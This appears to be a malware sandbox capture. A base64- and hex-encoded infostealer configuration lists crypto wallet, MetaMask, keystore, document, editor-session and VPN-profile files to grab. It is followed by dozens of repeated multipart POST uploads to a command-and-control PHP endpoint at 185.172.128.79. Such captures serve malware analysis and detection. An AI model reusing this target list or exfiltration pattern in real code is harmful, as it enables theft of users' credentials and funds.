                                                                                                                                                                                                                                                                                                                                                                Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:06.715724945 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECA
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.053371906 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.064419985 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.399482012 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.413405895 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.750111103 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:07.757878065 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.092911959 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.108943939 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.444791079 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.451145887 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGH
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.785240889 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:08.798360109 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.133774996 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.140825987 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.479429960 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.488332033 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.824708939 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:09.833625078 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFII
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:10.173695087 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:10.183346033 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:10.517746925 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:10.525239944 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:10.859117031 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:10.950700998 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JKEGHDGHCGHDHJKFBFBK
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:11.286835909 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:11.293103933 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHII
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:11.629519939 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:11.636564970 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:11.971597910 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:11.978326082 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:12.312197924 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:12.319971085 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JKKECBGIIIEBGCBGIDHD
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:12.652684927 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:12.658229113 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ECFCBKJDBFIJKFHIIDAA
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:12.993660927 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.001832008 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HJDGCGDBGCAAEBFIECGH
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.334323883 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.340456009 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.671547890 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:13.681777954 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FBAAAKFCAFIIDHIDGHIE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.014175892 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.026607990 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.357114077 CET170INHTTP/1.1 200 OK
